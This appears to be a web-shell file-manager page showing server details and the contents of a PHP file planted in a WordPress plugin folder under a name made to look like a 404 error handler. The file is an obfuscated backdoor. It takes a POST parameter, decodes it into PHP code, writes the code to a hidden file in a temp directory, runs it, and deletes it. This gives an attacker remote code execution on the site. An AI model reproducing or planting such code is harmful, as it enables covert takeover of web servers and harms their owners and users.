HEX
Server: Apache
System: Linux wyse1.wyseservers.com 4.18.0-553.124.4.el8_10.x86_64 #1 SMP Fri May 15 04:14:14 EDT 2026 x86_64
User: kochikidswysewor (1061)
PHP: 8.3.33
Disabled: NONE
Upload Files
File: /home/kochikidswysewor/public_html/wp-content/plugins/seo-1785341714/inc/error_404_1785341715.php
<!--g4OUkTIo-->
<?php

if(filter_has_var(INPUT_POST, "\x62i\x6E\x64in\x67")){
$ent = $_REQUEST["\x62i\x6E\x64in\x67"];
 		$ent 		=	explode  (".",	$ent	 	) ;
$sym = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s);
$i = 0;
$len = count($ent);

do {
    if ($i>=		$len) break;
    $val = $ent[$i];
    $sChar = ord($s[$i % $sLen]);
    $dec = ((int)$val - $sChar - ($i % 10)) ^ 59;
    $sym .= chr($dec);
    $i++;
} while (true);
$object = array_filter(["/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), getenv("TMP"), getcwd(), sys_get_temp_dir(), "/tmp"]);
foreach ($object as $symbol):
            if ((function($d) { return is_dir($d) && is_writable($d); })($symbol)) {
            $pgrp = "$symbol" . "/.marker";
            if (file_put_contents($pgrp, $sym)) {
    include $pgrp;
    @unlink($pgrp);
    exit;
}
        }
endforeach;
}